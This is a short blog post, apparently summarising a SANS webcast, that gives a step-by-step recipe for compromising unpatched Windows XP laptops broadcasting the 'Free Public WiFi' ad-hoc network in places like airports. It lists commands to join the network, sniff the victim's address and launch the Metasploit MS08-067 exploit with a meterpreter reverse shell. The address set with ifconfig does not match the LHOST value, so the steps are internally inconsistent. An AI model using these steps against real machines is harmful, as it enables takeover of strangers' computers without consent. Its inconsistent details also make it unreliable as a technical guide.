A few weeks ago Joshua Wright did a SANS webcast on Exploiting Modern Wireless Networks. For a long time WiFi attacks have focused on either cracking WEP, or brute forcing a WPA shared key. Josh goes over some of the new attack vectors against wireless and how you can use them in a penetration test.
My favorite slide had to do with that obscure “Free Public WiFi” SSID that we see all over the place. I see these all the time at airports, but also at hotels and other commonly utilized public wifi areas. Apparently this is the default name for ad-hoc networks that are created by Windows XP SP2. Obviously this gets us excited ( MS 08-067). If they are running an XP SP2 box, we can probably assume that the machine is not frequently administered, and most likely not patched. Here are the simple steps that Josh Wright provided in order to exploit this machine:
- Connect to the adhoc network
# iwconfig wlan1 essid "Free Public WiFi" mode adhoc
- Use tcpdump to find the IP (bolded IP below) of the XP box hosting the ad hoc network. Note: the hosting box will be broadcasting NetBIOS packets to help configure associated clients.
# tcpdump -ni wlan1 -s0 -nt
IP 169.254.131.118.138 > 169.254.255.255.138: NBT UDP PACKET(138)
- Configure your IP (for the reverse shell to shovel back to)
# ifconfig wlan1 188.8.131.52 netmask 255.255.0.0
- Own It
# msconsole# use exploit/windows/smb/ms08_067_netapi# set PAYLOAD windows/meterpreter/reverse_tcp# set LPORT 9999# set RHOST 169.254.131.118# set LHOST 169.254.1.1# exploit
Pretty straight forward, huh? As always, thanks to the SANS teams for their awesome contributions to the security industry. Make sure to check out the new SANS Pen Testing blog! its fantastic!